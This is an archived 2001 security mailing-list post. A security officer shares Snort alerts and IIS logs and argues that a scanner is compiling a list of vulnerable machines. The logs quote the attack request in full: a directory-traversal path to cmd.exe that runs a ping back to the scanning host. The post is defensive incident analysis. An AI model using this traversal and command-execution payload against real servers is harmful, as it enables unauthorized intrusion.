Sneaky vuln-scanning, vulnerable list generation

From: Keith.Morgan (Keith.Morganat_private)
Date: Fri Jul 27 2001 - 10:08:34 PDT

  • Next message: Sean Chittenden: "BSDi telnetd exploitable..."

    I don't think this is a worm.   I think this is most probably a black-hat
    scanning technique.
    
    Note the command the scanner attempted to execute.  A single ping-back to
    the scanning machine.  This would allow the scanner to easily generate a
    list of vulnerable boxen.
    
    Attached are intrusion detection system and webserver logs in EST.
    
    Jul 27 11:02:30 stonegate snort: IIS-command-execution-attempt:
    24.41.72.83:2724 -> Pub.IP.Address:80
    Jul 27 11:02:34 stonegate snort: IIS-command-execution-attempt:
    24.41.72.83:2828 -> Pub.IP.Address:80
    Jul 27 11:02:37 stonegate snort: IIS-command-execution-attempt:
    24.41.72.83:2927 -> Pub.IP.Address:80
    Jul 27 11:02:45 stonegate snort: IIS-command-execution-attempt:
    24.41.72.83:2724 -> Pub.IP.Address:80
    Jul 27 11:02:55 stonegate snort: IIS-command-execution-attempt:
    24.41.72.83:2924 -> Pub.IP.Address:80
    Jul 27 11:03:10 stonegate snort: IIS-command-execution-attempt:
    24.41.72.83:2924 -> Pub.IP.Address:80
    
    2001-07-27 11:02:39 24.41.72.83 - Private.IP.Address 80 8r?@?GET
    /scripts/..%5c..%5cwi
    nnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -
    2001-07-27 11:02:56 24.41.72.83 - Private.IP.Address 80 8r?@?GET
    /scripts/..%5c..%5cwi
    nnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -
    
    
    Keith T. Morgan
    Chief of Information Security
    Terradon Communications
    keith.morganat_private
    304-755-8291 x142
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Sun Jul 29 2001 - 09:22:01 PDT